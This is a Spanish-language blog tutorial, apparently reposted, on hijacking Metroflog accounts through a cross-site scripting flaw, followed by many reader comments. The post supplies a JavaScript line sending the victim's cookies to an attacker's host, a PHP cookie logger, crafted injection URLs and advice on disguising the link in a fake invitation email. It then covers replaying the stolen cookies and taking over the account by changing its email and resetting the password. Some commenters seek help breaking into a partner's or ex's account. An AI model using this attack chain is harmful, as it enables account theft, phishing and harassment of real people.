Tutorial para hackear metroflog(xSS EN METROFLOG)

Este tutorial es bueno y me lo encontre en este blog: http://trucosmf2009. blogspot.com/

Disfrutenlo.

.:: Introduccion ::..

Pues este sera al primer tutorial que pondre aqui en mi blog, y al parecer sera uno muy bueno. Si se ponen a buscar en internet (llamese San Google) acerca de como hackear Metroflog, dudo que encuentren algo verdaderamente bueno, como esto que les voy a poner. Si llegan a encontrar algo sera o un Scam o que existe la vulnerabilidad XSS, que es la que ya habia publicado desde el año pasado.

El Scam se vuelve una tecnica complicada comparada contra esto que les voy a poner aqui. Ademas ya la gente no es tan tonta como para caer en los Scam (ahahaha, es broma, la neta hay muchisima todavia xD).

Esta tecnica que voy a explicar aprovecha la vulnerabilidad XSS, que es un error que se encuentra un muchas otras paginas, asi que el procedimiento, funciona para cualquier otra pagina con el mismo error, por lo que lo que les voy a poner no es ningun truco nuevo, simplemente intento dejar claro, como se llevaria a cabo en el caso de Metroflog.

..:: Entendiendo la Vulnerabilidad XSS ::..

Antes de empezar a explicar como aprovechar la vulnerabilidad, entendamos como es. El XSS segun Wikipeda es “un tipo de inseguridad informática o agujero de seguridad basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado.” No manchen, se escucha chido, pero no se si se entendio, asi que tratare de explicarlo con mis palabras.

El XSS es un error de programacion en paginas web, a traves del cual se puede hacer una inyeccion de codigo en HTML o Javascript, a traves de una variable que utilice la misma pagina web. Por la misma naturaleza de esos lenguajes de programacion, sabemos que no pueden afectar directamente al servidor donde se encuentra alojada esa pagina Web, y sabemos que solo se ejecutaran de manera local en donde hayamos hecho la inyeccion.

En el caso de Metroflog, la variable que es vulnerable es la variable “pos”. Esta variable se vuelve visible para nosotros cuando damos en click en una de las fotos pequeñas que aparecen arriba en los metroflogs, que vienen siendo las fotos anteriores. Si entramos directamente al metroflog, no veremos esta variable en nuestro explorador.

Hasta ahi, al parecer no es una vulnerabilidad grave, pero creanme, lo es. Y se vuelve mas grave, cuando en la pagina web se manejan coockies (no pienso explicar que son las coockies), y por lo general manejamos coockies en las webs donde nos podemos registrar (hotmail, gmail, yahoo, metroflog, blogspot, una infinidad de paginas, etc).

..:: El ingenio del ataque XSS ::..

Bien, ahora viene la parte ingeniosa de este ataque: si el codigo inyectado solo puede ser HTML o Javascript, y solo es de manera local ¿Como Hackeo un Metroflog con eso?. Bien veamos la cadenita.

Alguien alguna vez me dijo que a este metodo de analisis se le llamaba “Reduccion a lo absurdo” y funciona de esta forma:

Quiero llegar a Hackear un metro, ese es el objetivo final, y puedo lograrlo de dos formas: o conociendo la contraseña o conociendo los valores de todas las coockies. Este metodo esta encaminado a las coockies y entonces asi lo explicare, aunque de todos modos mas adelante explico como sacar la contraseña tmb (h).

Bien, ya se que obteniendo las coockies, hackeare ese metro, pero ¿Como obtengo las cookies?. Pues con codigo Javascript es posible acceder a esos valores, a traves de document.cookie que es una como variable que guarda los valores de las cookies.

Hasta aqui como que ya va agarrando forma. Pero si accedo a document.cookie inyectando codigo en mi computadora, pues solo vere mis coockies. Y si hago (que no es facil, pero mas abajo explico el metodo) que alguien mas inyecte ese codigo en su computadora, pues solo lo veran ellos =O. Este es un nuevo problema, ¿Como le hago para que esa persona inyecte ese codigo en su computadora, pero que yo tambien pueda ver el valor de esas coockies?

Este nuevo dilema lo podriamos resolver, si de alguna forma ejecutaramos PHP tambien, ya que PHP si se ejecuta directamente en el servidor, de esa forma, el valor de esas cookies las podriamos guardar en otro archivo que se encuentre en el mismo servidor. Ahora un nuevo dilema ¿Como ejecuto PHP desde Javascript? ¿Es posible?

La respuesta es “Si!” xD. Utilizando una pequeña redireccion en javascript, podemos linkear a un codigo en PHP, y a traves del metodo GET pasarlo a alguna variable que este contenida en nuestro archivo PHP y asi almacenarlo en un nuevo archivo, al cual nosotros tenemos acceso. Esa fue la rapida explicacion del ingenio de esta tecnica, que no es elite ni h4x0r en ningun sentido, cabe destacar eso.

..:: ¿Que se necesita para poner en practica esta tecnica? ::..

Pues lo que necesitamos para hackear un metro es lo siguiente:

* Metroflog de nuestra victima
* Su cuenta de correo (Esto es opcional, ahorita explico por que, aunque tener el correo es la mejor opcion)
* Un archivo en javascript
* Un archivo en PHP
* Hosting para almacenar los archivos.

..:: Aplicando nuestra tecnica de manera detallada::..

Bien, primero una ves entendida la explicacion, vayamos a lo bueno: los codigos. Estos codigos no son nuevos, ni mucho menos, de hecho es muy facil encontrarlos en muchisimas paginas, el hecho es saberlos utilizar bien.

El codigo en javascript es una sola linea de codigo y seria el siguiente:

window.location=’http://www.tu-host.com/roba_cookies.php?cookie=’+document.cookie

Esa linea de codigo la guardamos con extension .js, y le damos el nombre que sea, en este caso yo la llamare “redireccion.js”. Si nos damos cuenta, utiliza la funcion windows.location, que sirve para direccionar; ahi nos esta mandando al archivo php que se llama “roba_cookies.php” y que tiene una variable llamada coockies que toma el valor de “document.cookie”, es decir las cookies de metroflog de nuestra victima =).

NOTA: el codigo del siguiente archivo php debe llevar en la primera linea de codigo el “<” seguido de “?”, solo que no se lo puse ya que al parecer se interpreta. Ahora veamos como seria el codigo del archivo “roba_cookies.php”:

$cookies = $_GET['cookies'];
$guardando = fopen(“cookies.txt”,”a”);
$ip = $_SERVER['REMOTE_ADDR'];
$hora = date(“G:H:s”);
fwrite($guardando, “IP: $ip \n”);
fwrite($guardando, “Hora: $hora \n”);
fwrite($guardando, “Valores de las cookies: \n”);
fwrite($guardando, “$cookies \n”);
fclose($guardando);
?>

¿Lo explico? Ok, lo hare linea por linea. Primero a traves del metodo GET le da el valor a $cookies con el valor de document.coockie. Despues ejecuta la accion de abrir y poder escribir en un archivo llamado cookies.txt. Obtiene la IP de nuestra victima. Obtiene la Hora actual del servidor. Escribe la IP. Escribe la Hora. Escribe “Valores de las cookies:”. Escribe el valor de las cookies.

Bien. ya tenemos los codigos que necesitamos. Pero ahora necesitamos algo mas, el link que realiza la inyeccion del codigo javascript. Voy a utilizar la pagina de alguien desconocido como ejemplo, aunque no le haremos daño a su metro, solo sera para que vean como funcionan las inyecciones.

Usemos el metro de Claudia xD: 

Y veamos que exite el link 

Si nos fijamos, la variable “pos” es la fecha de publicacion de esa foto 22 de noviembre del 2008. Bueno, eso no nos interesa, haha, solo era un comentario. Existe otra variable llamada nf, que la verdad no nos ayuda ni nos perjudica.

Veamos con un ejemplo como funciona esta inyeccion: http://www.metroflog.com/dangerously-cute/20081122/?pos=%22%3E%3Cscript%3Ealert(/Owned%20by%20mx0x/)%3C/script%3E

Si damos click, en el link anterior, nos abre el metro y nos salta un mensaje. Justamente eso hace la funcion alert de javascript. Es solo una forma de comprobar la vulnerabilidad. Ahora vayamos al link que nos interesa, la Poisoned URL, haha, bueno, la URL que nos direccion al codigo en javascript.

http://www.metroflog.com/dangerously-cute/20081122/?pos=%22%3E%3Cscript src=”http://www.tu-host.com/redireccion.js”>

Va de nuevo, dando click en el link anterior, nos hace llegar al metro, pero rapidamente, nos redireccion al archivo en javascript, que nuevamente, nos manda al archivo php que guarda los valores de las coockies en un archivo de texto, al cual tenemos acceso.

El archivo de texto que almacena las cookies guardaria cada registro de la siguiente manera:

IP: 127.0.0.1
Hora: 8:08:49
Valores de las cookies:
__utma=18306213.2086185802.1223149270.1231378158.1231397360.68; __utmz=18306213.1231378158.67.30….

..:: ¿Como le hago para hacer que la otra persona entre en ese link tan raro? ::..

Es facil jo jo. Puede ser de mil formas, pero una que se me ocurre es la siguiente. Cuando alguien sube una foto a un metro, algunas de las veces, se spamea el correo de sus contactos con un correo que dice “Te invito a ver mi Metroflog” o algo asi. Entonces podemos enviar un correo de esos, donde diga lo mismo, pero modificando el link, de modo que parezca normal, pero que al darle click nos mande al link con el codigo.

El link podria ser como este: http://www.metroflog.com/dangerously-cute A simple vista parece que solo nos manda al metro, pero al darle click nos ejecute el codigo. Muy poca gente, se daria cuenta de que en la barra de abajo del explorador aparece la direccion completa. Bien esa es una forma, pero se pueden ingeniar muchas otras, como por ejemplo cambiar los caracteres por su valor en ascii, ocultando los links.

..:: Ya tengo los valores de las cookies ¿Y ahora? ::..

Pues lo que sigue es crearse la cookie, para eso recomiendo usar FireFox y el addon de Cookie Editor (xD?). De esa forma sera tan facil como editar un campo de texto por cada cookie. Con el editor veremos listada cada variable, al darle click a una de ella, nos mostrara su valor en la parte que dice content. Solo sera cuestion de darle al boton de Edit y cambiar ese valor, por los valores almacenados por el archivo PHP. Se debe de ver algo mas o menos como se muestra en la siguiente imagen:

Una vez editadas todas las cookies con los valores guardados, refrescamos el metroflog, y automaticamente estaremos logeados como ese usuario xD. Y sin necesidad de conocer su contraseña, esto es muy importante. Ahora ya podremos hacer lo que sea: subir fotos, borrar comentarios, cambiar colores, postear en otros metros con ese usuario, etc.

Este es un metro que ownee desde el año pasado, cuando andaba checando esta vulnerabilidad, aqui les dejo el screen:

http://i155.photobucket.com/albums/s292/FhUrER/ownedtifaa.jpg

..:: Ya tengo las cookies y ya hice maldades, pero quiero mas ¿Como obtengo la contraseña? ::..

Metroflog tiene otro detalle, que podria considerarse como error. Una vez logeado como el usuario podremos acceder al panel, pero no podremos cambiar la contraseña, ya que nos pide la contraseña actual, la cual no conocemos x_x. Sin embargo, podemos cambiar el correo, jo jo. Cambiamos el correo por uno nuestro, para realizar este cambio no nos pide la contraseña, solo una pequeña comprobacion que es enviada a nuestro correo.

Una vez cambiado el correo, le damos en Log Out o en Salir. Y vamos a www.metroflog.com y le damos en Olvidaste tu contraseña? (xD). Ahi nos pide el e-mail, que ya es el nuestro, le damos en Enviar y listo!! la contraseña nos llegara asi de facilmente a nuestro correo =) Ahora ya tenemos totalmente owneada la cuenta de metroflog, ya que asi ya podemos cambiar la contraseña.

..:: Comentarios finales ::..

Pues solo quiero comentar que “no hagas, lo que no te gustaria que te hicieran, aunque si estas seguro de que no te lo pueden hacer, entonces hazlo xD”. Este metodo, como se habran dado cuenta es basicamente hacer click sobre un link y listo, tu metroflog sera owneado. Asi que tengan cuidado!, fijense en donde hacen click, porque en una de esas te tumban el metro. Por eso no usen esas cosas, usen Blogs, y recomiendo Blogspot, la verdad. Luego hare un post de MetroFlog VS Blogspot y veran que paliza!! hahaha. Bien, este es un verdadero metodo de como hackear una cuenta de MetroFlog, espero haber sido lo suficientemente explicito, espero que les sea util y les haya gustado.

NOTA: Ya lo habia dicho, esto no es elite, no te vuelve hacker. De hecho tal vez no debi haber usado la palabra “hack”, simplemente es ownear una cuenta.

Categ: manuales Tags:

192 respuestas en "Tutorial para hackear metroflog(xSS EN METROFLOG)"

  1. yakeliin dice:

    oOiie ps la vdd iioO noO entendi nda
    de ese doOpe hoOmii
    ii poOs sii kiieroO subiir bariias
    foOtoOsS a mii floOg aii me aiiudazzz noO

  2. susy dice:

    puuff
    pz n0 3nt3ndi nada???

  3. Esteban dice:

    xDD supongo que quienes no entendieron son esas personas que usan sólo la computadora para chatear y metroflog u__ú

    voy a probarlo, gracias =D

  4. betokabron dice:

    jeje,,,si funciona te chupare las bolas
    jajajajaja

  5. Santiago dice:

    Todo todo bien, exelente tutorial.
    Pero… tengo problemas con el Hosting de Almacenamiento.

    Me marca error de esta forma:
    PHP ERROR
    Parse error: syntax error, unexpected ‘:’ in /home/a3174094/public_html/ms_hax/roba_cookies.php on line 5

    Supongo que debe ser algo del hosting…

    Cual me recomiendas usar?
    Cual te ha funcionado correctamente?

  6. Santiago dice:

    Ahmm….
    Sera que ya no funciona con la nueva version del MetroFlog?

    Cambio mucho…

  7. cesar dice:

    oie compa o el k haia subido este mugrero eso no sive!!! y lla lo intente todo yo si copie!!
    todo i no siveee!!!

  8. Itzel dice:

    no entendi mucho … pero en realidad yo tambien quiero divertirme un poco … me ayudarias?? *u*

  9. cObOs dice:

    como puedo subir mAS de dos fotos al dIa ., ]
    jje solo eso xD

  10. bibiana dice:

    como puedo subir mas de dos fotos al dia a mi metroflog ] ] o con dos fotos al dia me conformo .

  11. n0b007 dice:

    jeje perdon
    no entendi mucho
    pero lo estare repasando
    es que quiero aprender de las XSS
    gracias por el post
    y una pregunta
    ¿donde descargo
    el aNEC coockies editor?

  12. maysi dice:

    creo q no entendi mucho

    jjajajaj

  13. elma mon dice:

    no entendi ni putasmadres =) .l.

  14. hacker dice:

    buen comentario
    pero hay formas mas
    faciles de aserlo
    para que no se los piraten
    a ustedes pongan
    banderita r
    y despues que les
    aparesca una bentana
    pongan %temp%
    borran todo lo que
    esta hay y listo
    bye

  15. hacker dice:

    y pues para los que
    no entendieron
    pues no pasen todo
    su tiempo
    chateando ni en su metro
    hay mas cosas en el internet
    que se pueden aser y no
    solo hablar con sus amiguitos
    de siempre
    les recomiendo que practiquen
    mas cosas si no eso seria
    desperdicio del internet
    y de su vida
    nos bemos
    sigue asi con tus trucos
    aver cuando te paso unos
    para que los pongas

  16. luis dice:

    jajaj me dan risa. entran emocionados para ver como “hackear” el metroflog y no entienden ni ptm, ajajaja y mas jaja. como dicen los otros esos que no entienden son los que solo se dedican a usar la computadora para el msn, metroflog, facebook y demas pndejaditas. por si no lop saben, la computacion (llamese informatica9 es un marravilloso y complejo mundo.que si es aprovechado con todo su potencial se pueden lograr grandes cosas. me imagino que ni idea de que php, los javascrip,las vulnerabilidades, los lenguajes de programacion, unix,vamos ni siquiera saben que es una IP o un hosting. pero bueno gracias a ellos las personas como yo tenemos trabajo XD.
    recuerden solo es mi punto de vista. un saludo a todos.

    • mausoleo dice:

      la informática no es gran cosa (es una mamadita), cualquiera en una semana aprende todo eso. . . mejor ponte a estudiar cosas que de enserio te sirvan, como anatomia, fisiologia, bioquimica como es que chingados funciona tu cuerpo, pero bueno gracias a personas como tu, doctores como yo tenemos trabajo =D
      gracias por desperdiciar tu vida. . .

  17. maxi dice:

    luiiiis amasameee el chotoooo cabrooon

  18. jesus dice:

    la verdad amigo no entendi mi mier..
    sabes mejo has un video ¡¡

  19. LUIS dice:

    UFF
    LA NETA ES UN MEGA TUTORIAL
    ME SIRVIO MUCHISIMO
    SAEL SE CUIDA
    GRACIAS
    GRACIAS
    GRACIAS
    BUEN TRUCO
    HAORA SI AA HACER UNAS COSILLAS
    PENDIENTES!!1

  20. Elizabeth dice:

    Ps me gustaria intentarlo pero la verdad no soy buena en esto, mejor no me ayudarias, me hakearon mi flog me ayudas a recuperarlo??

    please

    mi msn

    amberydain@hotmail.com
    mandame un correo con tu respuesta por fas

  21. wi wii dice:

    hey hey agrega mi correo
    ayudame a hacer eso =S
    no seas malo

  22. NO ENTENDI NI MADRES CABRON KE ALGUIEN ME EXPLIKKKKKKKEEEEEEEEEEEE JAJAJAJAJAJAJA

  23. Diana dice:

    LA VERDAD NO ENTENDI MUCHO LO PRIMERO SI PERO YA DESPUES ME CONFUNDI MUCHO ME PODRIAS AYUDAR PORFA

  24. kike dice:

    staria mas facil de entender pa’ los novatillos como io si hiciras un video tutorial…
    = Grax..

  25. wendy dice:

    se los explicare mejor, solo entren a
    http://www.metroflog.com/wendyzxc y se los digo
    agregenme y firmen, devuelvo firmas

  26. monarca dice:

    cHE PENDEJOS ESTE TUTORIAL ES PARA LEER PASO A PASO NO PARA NOVATOIDES LAMMERS!

    si en verdad les interesa hack (q no seria hack seria arto lammer) deberian de leer un poko.

    este metodo funciona a un amigo de un club de fans se lo quitamos asi.

    saludos

  27. raul 222 dice:

    neta????? weno no entendi mucho pero si veo que no puedo le invento aver que me sale no manches mwey pues la neta yo no lo usaria para hacer maldades solo para bromiar con mis compas weno grasias te lo agradesco

  28. Alejandro dice:

    por favor ayudame man…necesito saber la contra de un metro que es de mi novia y la bien perra no me lo kiere decir… AYUDAAAAAAAAAAAA PLEASEEEEEEEEEEEEEE

  29. elena99 dice:

    ps es k la vdd
    no00o entendii
    nada de ese doOpe hoOmii
    pero0 yo0o kiiero0o sufiir
    variias fotidco0s
    e ami metro

  30. Todas las personas que no entienden, les digo que utilicen el internet para algo bueno.

    Hackear no es algo sencillo, se necesitan conocimientos informáticos como programación, redes, etc.

    Además, aprendan escribir bien, aparentan como si nunca hubieran ido a la escuela y se la pasan pegados en su MSN, Metroflog, MySpace. Esa gente es la primera que hackean por ser pasivos.

  31. XSS dice:

    Santiago, el nombre “roba_cookies.php” lo tienes que substituir por el nopmbre de tu archivo php, o en caso contrario ponerle el mismo nombre al tuyo (roba_cookies.php)

    PHP ERROR
    Parse error: syntax error, unexpected ‘:’ in /home/a3174094/public_html/ms_hax/roba_cookies.php on line 5

    no es problema del servidor, fíjate que todos tus archivos concuerden en nombre y servidores.
    :)
    Aunque sinceramente no deberían hacer esto, es un poco infantil no creen?

    ah y para el de allá arriba que no entendió nada, no seas menso, abre tu bloc de notas en windows, copia y pega los datos que te estan dando, dale guardar como… y sustituye el nombre por un archivo con terminación .php y .js respectivamente.
    :)

  32. CarlosGR dice:

    ey que onda, la vdd es que no entendi mucho que digamos jaja, pero ey tenia mi mf asi bien padre con 6 fotos diarias y 2100 por opuesta y hoy me lo acaban de hackear :S queria ver si me pudieras ayudar a recuperarlo plis

  33. anna dice:

    pzZ…
    bueno iio nezsesito saver como
    subir 6 fotos por diiia
    me podriian decir
    como suviir las 6 fotos por diia ????

    mdiganme porfovor lo necesito para el metoflog

    =)

  34. gabo dice:

    puta madre no entedi ni madres we explica mejor

  35. inocg dice:

    jaja zke no entienden por qq no zta todo zpliqqado si no saben nada de javascript ni lenguaje web no sabran qoomo hacerlo man deberias de ponerles qoomo se hacen los archivos ii qq es lo qq pasa por qq si no la genete nomas no va a entender jaja saludoooooooos =)

  36. PFF dice:

    NO Ntndiii nii maiisz

  37. HH dice:

    AMM PUES! HEHE ESTOI HACIENDO MI MAYOR ESFUERSO PERO PORFAVOOR AYUDAME SI!…

    IGUAL A MI ME HAKEARON HAHA II PARA MI EL HH TIENE UN GRAN VALOR SENTIMENTAL!^^…

    PERO SI NO PUEDES HARE LO POSIBLE PARA PODER HACERLO TENLO POR SEGURO!

    vegebul@hotmail.es HEHE QUE APOVECHAD PERO POR LAS DUDAS HEHE!

  38. La niña bee dice:

    heey como chin..puuedO hacceer qe nandie puueda vee rmi metroo..?

  39. niurka_rdz dice:

    aki depas0 bay aby t3 kuidas

  40. niurka_rdz dice:

    akid epas0 bay aby t3 kuidas

  41. yomismo dice:

    Metroflog ya no es vulnerable a xss mi mas sentido pesame xD

  42. M&R...*;G dice:

    neethaa Qee” noo entendiii nada deee nadaa..!!!

  43. claudio dice:

    mierdaa– tube una media ora para leeer esto y no entendi haha

  44. Anne dice:

    Holaaaaaaaa quisiera que me ayudaras a Hackear un metroflog, ya esta abandonado, era de mi ex y quiero recuperarlo, PORFAVOOOOOOOOOOOOOOOOOOOOOOR! T_T no me se su contraseña y me serviria de mucho tu ayudaa! el metroflog opcional es el que quiero hackear espero tu respuesta!

  45. malena dice:

    holis

    pasame
    el truco de las 6fotos
    x dia
    xfi te dejo mi msn es
    malena_capa_09@hotmail.com

    xki
    dsle
    me llamo malena

  46. hahaha es me c0n biene p0r me aburre una f0t0 p0r dia haha y y0 quier0 muchas f0t0s p0r dia hahaha

  47. yo dice:

    amigo no te entendi nada pero porfas haz un video

Leave a reply